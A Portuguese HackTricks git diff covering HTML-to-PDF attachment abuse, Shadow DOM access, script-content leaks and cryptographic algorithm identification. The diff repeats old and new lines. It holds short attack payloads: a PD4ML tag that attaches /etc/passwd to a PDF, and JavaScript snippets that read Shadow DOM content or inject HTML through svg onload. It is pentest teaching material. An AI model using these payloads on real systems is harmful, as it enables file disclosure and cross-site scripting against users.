Existem alguns motores HTML 2 PDF que permitem **especificar anexos para o PDF**, como o **PD4ML**. Você pode abusar dessa funcionalidade para **anexar qualquer arquivo local** ao PDF.\
Para abrir o anexo, abri o arquivo com o **Firefox e cliquei duas vezes no símbolo do clip de papel** para **armazenar o anexo** como um novo arquivo.\
Capturar a **resposta em PDF** com o burp também deve **mostrar o anexo em texto claro** dentro do PDF.
Existem alguns motores de conversão de HTML para PDF que permitem **especificar anexos para o PDF**, como o **PD4ML**. Você pode abusar dessa funcionalidade para **anexar qualquer arquivo local** ao PDF.\
Para abrir o anexo, eu abri o arquivo com o **Firefox e cliquei duas vezes no símbolo do clipe de papel** para **armazenar o anexo** como um novo arquivo.\
Capturar a **resposta do PDF** com o burp também deve **mostrar o anexo em texto claro** dentro do PDF.
{% code overflow="wrap" %}
```html
<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html><pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip"/></html>
```
{% endcode %}
## Referências
* [https://lbherrera.github.io/lab/h1415-ctf-writeup.html](https://lbherrera.github.io/lab/h1415-ctf-writeup.html)
@ -198,12 +182,14 @@ Capturar a **resposta em PDF** com o burp também deve **mostrar o anexo em text
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

54
pentesting-web/xss-cross-site-scripting/shadow-dom.md
View file

@ -2,43 +2,45 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Informações Básicas
Shadow DOM faz parte do conjunto de recursos [Web Components](https://developer.mozilla.org/en-US/docs/Web/Web\_Components), que tem como objetivo permitir que desenvolvedores JS criem elementos personalizados reutilizáveis com sua funcionalidade encapsulada longe do restante do código do site.
Shadow DOM é parte do conjunto de recursos [Web Components](https://developer.mozilla.org/en-US/docs/Web/Web\_Components), que visa permitir que desenvolvedores JS criem elementos personalizados reutilizáveis com sua funcionalidade encapsulada, separada do restante do código do site.
Essencialmente, você pode usar o Shadow DOM para **isolar o HTML e o CSS do seu componente do restante da página da web**. Por exemplo, se você criar IDs de elementos em um shadow DOM, eles **não entrarão em conflito com IDs de elementos no DOM pai**. Quaisquer seletores CSS que você utilizar no seu shadow DOM serão aplicados apenas dentro do shadow DOM e não ao DOM pai, e quaisquer seletores que você utilizar no pai não penetrarão no shadow DOM.
Essencialmente, você pode usar o Shadow DOM para **isolar o HTML e CSS do seu componente do restante da página web**. Por exemplo, se você criar IDs de elementos em um shadow DOM, eles **não entrarão em conflito com IDs de elementos no DOM pai**. Quaisquer seletores CSS que você utilizar no seu shadow DOM serão aplicados apenas dentro do shadow DOM e não ao DOM pai, e quaisquer seletores que você utilizar no DOM pai não penetrarão dentro do shadow DOM.
```js
// creating a shadow DOM
let $element = document.createElement("div");
$shadowDomRef = $element.attachShadow({ mode: "open" }); // open or closed
```
Normalmente, quando você anexa um **shadow DOM "aberto" a um elemento**, você pode obter uma referência ao shadow DOM com **`$element.shadowRoot`**. No entanto, se o shadow DOM estiver anexado em modo **"fechado"**, você **não pode obter uma referência** dessa maneira. Mesmo depois de ler toda a documentação do desenvolvedor que pude encontrar, ainda estou um pouco confuso sobre o propósito do modo fechado. [De acordo com o Google](https://developers.google.com/web/fundamentals/web-components/shadowdom):
Normalmente, quando você anexa um **"open" shadow DOM a um elemento**, você pode obter uma referência ao shadow DOM com **`$element.shadowRoot`**. No entanto, se o shadow DOM for anexado em modo **"closed"**, você **não pode obter uma referência** a ele dessa maneira. Mesmo após ler toda a documentação para desenvolvedores que pude encontrar, ainda estou um pouco incerto sobre o propósito do modo fechado. [De acordo com o Google](https://developers.google.com/web/fundamentals/web-components/shadowdom):
> Existe outra variação do shadow DOM chamada modo "fechado". Quando você cria uma árvore de sombra fechada, o JavaScript externo não poderá acessar o DOM interno do seu componente. Isso é semelhante ao funcionamento de elementos nativos como `<video>`. O JavaScript não pode acessar o shadow DOM de `<video>` porque o navegador o implementa usando uma raiz de sombra em modo fechado.
> Existe outra variação de shadow DOM chamada modo "closed". Quando você cria uma árvore shadow **closed**, **o JavaScript externo não será capaz de acessar o DOM interno do seu componente**. Isso é semelhante a como elementos nativos como `<video>` funcionam. O JavaScript não pode acessar o shadow DOM de `<video>` porque o navegador o implementa usando uma raiz de shadow em modo fechado.
No entanto, eles também afirmam:
> As raízes de sombra fechadas não são muito úteis. Alguns desenvolvedores veem o modo fechado como um recurso de segurança **artificial**. Mas vamos ser claros, isso **não** é um recurso de segurança.
> Raízes de shadow em modo fechado não são muito úteis. Alguns desenvolvedores verão o modo fechado como um **recurso de segurança artificial**. Mas vamos deixar claro, **não** é um recurso de segurança.
## Acessando o Shadow DOM
### window.find() e seleções de texto <a href="#introducing-windowfind-and-text-selections" id="introducing-windowfind-and-text-selections"></a>
A função **`window.find("texto_de_pesquisa")` penetra dentro de um shadow DOM**. Essa função tem efetivamente a mesma funcionalidade que ctrl-F em uma página da web.
A função **`window.find("search_text")` penetra dentro de um shadow DOM**. Essa função efetivamente tem a mesma funcionalidade que ctrl-F em uma página da web.
É possível chamar **`document.execCommand("SelectAll")`** para expandir a seleção o **máximo possível** e, em seguida, chamar **`window.getSelection()`** para **retornar o conteúdo** do texto selecionado dentro do shadow DOM.
É possível chamar **`document.execCommand("SelectAll")`** para expandir a seleção tanto quanto possível e, em seguida, chamar **`window.getSelection()`** para **retornar o conteúdo** do texto selecionado dentro do shadow DOM.
No **firefox**, você pode usar `getSelection()`, que retorna um objeto [Selection](https://developer.mozilla.org/en-US/docs/Web/API/Selection), onde `anchorElement` é uma **referência a um elemento no shadow DOM**. Portanto, podemos exfiltrar o conteúdo do shadow DOM da seguinte maneira:
No **firefox**, você pode usar `getSelection()`, que retorna um objeto [Selection](https://developer.mozilla.org/en-US/docs/Web/API/Selection), onde `anchorElement` é uma **referência a um elemento no shadow DOM**. Assim, podemos exfiltrar conteúdos do shadow DOM da seguinte forma:
```js
getSelection().anchorNode.parentNode.parentNode.parentNode.innerHTML
```
@ -46,21 +48,21 @@ Mas isso não funciona no Chromium.
### contenteditable ou injeção de CSS <a href="#contenteditable-or-css-injection" id="contenteditable-or-css-injection"></a>
Uma maneira pela qual podemos interagir com o shadow DOM é se tivermos uma **injeção de HTML ou JS dentro dele**. Existem algumas situações interessantes em que você pode obter uma injeção dentro de um shadow DOM onde não seria possível em uma página normal com crossorigin.
Uma maneira pela qual podemos interagir com o shadow DOM é se tivermos uma **injeção de HTML ou JS dentro dele**. Existem algumas situações interessantes onde você pode obter injeção dentro de um shadow DOM onde não seria possível em uma página normal com crossorigin.
Um exemplo disso é se você tiver quaisquer **elementos com o atributo `contenteditable`**. Este é um atributo HTML obsoleto e pouco utilizado que declara que o **conteúdo desse elemento pode ser editado pelo usuário**. Podemos usar seleções juntamente com a API **`document.execCommand`** para interagir com um elemento contenteditable e obter uma injeção de HTML!
Um exemplo é se você tem algum **elemento com o atributo `contenteditable`**. Este é um atributo HTML obsoleto e pouco usado que declara o **conteúdo daquele elemento como editável pelo usuário**. Podemos usar seleções junto com a API **`document.execCommand`** para interagir com um elemento contenteditable e obter uma injeção de HTML!
```js
find('selection within contenteditable');
document.execCommand('insertHTML',false,'<svg/onload=console.log(this.parentElement.outerHTML)>')
```
Talvez ainda mais interessante, **`contenteditable`** pode ser declarado em qualquer elemento no chromium aplicando uma propriedade CSS obsoleta: `-webkit-user-modify:read-write`
Talvez ainda mais interessante, **`contenteditable`** pode ser declarado em qualquer elemento no chromium aplicando uma **propriedade CSS obsoleta: `-webkit-user-modify:read-write`**
Isso nos permite **elevar uma injeção de CSS/style para uma injeção de HTML**, adicionando a propriedade CSS a um elemento e, em seguida, utilizando o comando `insertHTML`.
Isso nos permite **elevar uma injeção de CSS/estilo para uma injeção de HTML**, adicionando a propriedade CSS a um elemento e, em seguida, utilizando o comando `insertHTML`.
## CTF
Verifique este writeup onde essa técnica foi usada como um desafio CTF: [https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md](https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md)
Confira este writeup onde essa técnica foi usada como um desafio de CTF: [https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md](https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md)
## Referências
@ -68,12 +70,14 @@ Verifique este writeup onde essa técnica foi usada como um desafio CTF: [https:
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? Ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

38
pentesting-web/xss-cross-site-scripting/sniff-leak.md
View file

@ -1,33 +1,37 @@
# Vazamento de Script
# Sniff Leak
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Vazamento de conteúdo de script convertendo-o para UTF16
## Vazamento do conteúdo do script convertendo-o para UTF16
[**Este artigo**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#modernism21-solves) vaza um texto simples porque não há cabeçalho `X-Content-Type-Options: nosniff` adicionando alguns caracteres iniciais que farão o javascript pensar que o conteúdo está em UTF-16 para que o script não quebre.
[**Este writeup**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#modernism21-solves) vaza um texto/plano porque não há cabeçalho `X-Content-Type-Options: nosniff` adicionando alguns caracteres iniciais que farão o javascript pensar que o conteúdo está em UTF-16 para que o script não quebre.
## Vazamento de conteúdo de script tratando-o como um ICO
## Vazamento do conteúdo do script tratando-o como um ICO
[**O próximo artigo**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#precisionism3-solves) vaza o conteúdo do script carregando-o como se fosse uma imagem ICO acessando o parâmetro `width`.
[**O próximo writeup**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#precisionism3-solves) vaza o conteúdo do script carregando-o como se fosse uma imagem ICO acessando o parâmetro `width`.
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

191
reversing/cryptographic-algorithms/README.md
View file

@ -1,24 +1,26 @@
# Algoritmos Criptográficos/De Compressão
# Algoritmos Criptográficos/Compressão
## Algoritmos Criptográficos/De Compressão
## Algoritmos Criptográficos/Compressão
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Identificando Algoritmos
Se você encontrar um código **usando deslocamentos de bits, XORs e várias operações aritméticas**, é altamente possível que seja a implementação de um **algoritmo criptográfico**. Aqui serão mostradas algumas maneiras de **identificar o algoritmo que está sendo usado sem precisar reverter cada etapa**.
Se você terminar em um código **usando deslocamentos para a direita e esquerda, xors e várias operações aritméticas**, é muito provável que seja a implementação de um **algoritmo criptográfico**. Aqui serão mostradas algumas maneiras de **identificar o algoritmo usado sem precisar reverter cada etapa**.
### Funções de API
### Funções da API
**CryptDeriveKey**
@ -26,32 +28,183 @@ Se esta função for usada, você pode descobrir qual **algoritmo está sendo us
![](<../../.gitbook/assets/image (375) (1) (1) (1) (1).png>)
Confira aqui a tabela de algoritmos possíveis e seus valores atribuídos: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
Confira aqui a tabela de possíveis algoritmos e seus valores atribuídos: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
**RtlCompressBuffer/RtlDecompressBuffer**
Comprime e descomprime um buffer de dados fornecido.
Comprime e descomprime um dado buffer de dados.
**CryptAcquireContext**
A função **CryptAcquireContext** é usada para adquirir um identificador para um contêiner de chave específico dentro de um provedor de serviços criptográficos (CSP) específico. **Este identificador retornado é usado em chamadas para funções CryptoAPI** que usam o CSP selecionado.
A função **CryptAcquireContext** é usada para adquirir um identificador para um contêiner de chave específico dentro de um provedor de serviços criptográficos (CSP) específico. **Este identificador retornado é usado em chamadas para funções da CryptoAPI** que usam o CSP selecionado.
**CryptCreateHash**
Inicia o hashing de um fluxo de dados. Se esta função for usada, você pode descobrir qual **algoritmo está sendo usado** verificando o valor do segundo parâmetro:
Inicia a hash de um fluxo de dados. Se esta função for usada, você pode descobrir qual **algoritmo está sendo usado** verificando o valor do segundo parâmetro:
![](<../../.gitbook/assets/image (376).png>)
Confira aqui a tabela de algoritmos possíveis e seus valores atribuídos: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
\
Confira aqui a tabela de possíveis algoritmos e seus valores atribuídos: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
### Constantes de Código
### Constantes do Código
Às vezes, é muito fácil identificar um algoritmo graças ao fato de que ele precisa usar um valor especial e único.
Às vezes é muito fácil identificar um algoritmo graças ao fato de que ele precisa usar um valor especial e único.
![](<../../.gitbook/assets/image (370).png>)
Se você pesquisar a primeira constante no Google, é isso que você obtém:
Se você pesquisar pela primeira constante no Google, isso é o que você obtém:
![](<../../.gitbook/assets/image (371).png>)
Portanto, você pode assumir que a função descompilada é um **calculador sha256**
Portanto, você pode assumir que a função descompilada é um **calculador sha256.**\
Você pode pesquisar qualquer uma das outras constantes e obterá (provavelmente) o mesmo resultado.
### Informações dos dados
Se o código não tiver nenhuma constante significativa, ele pode estar **carregando informações da seção .data**.\
Você pode acessar esses dados, **agrupar o primeiro dword** e pesquisar por ele no Google como fizemos na seção anterior:
![](<../../.gitbook/assets/image (372).png>)
Neste caso, se você procurar por **0xA56363C6**, você pode descobrir que está relacionado às **tabelas do algoritmo AES**.
## RC4 **(Criptografia Simétrica)**
### Características
É composto por 3 partes principais:
* **Estágio de inicialização/**: Cria uma **tabela de valores de 0x00 a 0xFF** (256 bytes no total, 0x100). Esta tabela é comumente chamada de **Caixa de Substituição** (ou SBox).
* **Estágio de embaralhamento**: Vai **percorrer a tabela** criada anteriormente (loop de 0x100 iterações, novamente) modificando cada valor com bytes **semi-aleatórios**. Para criar esses bytes semi-aleatórios, a **chave RC4 é usada**. As chaves RC4 podem ter **entre 1 e 256 bytes de comprimento**, no entanto, geralmente é recomendado que seja acima de 5 bytes. Comumente, as chaves RC4 têm 16 bytes de comprimento.
* **Estágio XOR**: Finalmente, o texto puro ou cifrado é **XORed com os valores criados anteriormente**. A função para criptografar e descriptografar é a mesma. Para isso, um **loop pelos 256 bytes criados** será realizado quantas vezes forem necessárias. Isso geralmente é reconhecido em um código descompilado com um **%256 (mod 256)**.
{% hint style="info" %}
**Para identificar um RC4 em um código desmontado/descompilado, você pode verificar 2 loops de tamanho 0x100 (com o uso de uma chave) e depois um XOR dos dados de entrada com os 256 valores criados anteriormente nos 2 loops, provavelmente usando um %256 (mod 256)**
{% endhint %}
### **Estágio de Inicialização/Caixa de Substituição:** (Note o número 256 usado como contador e como um 0 é escrito em cada lugar dos 256 caracteres)
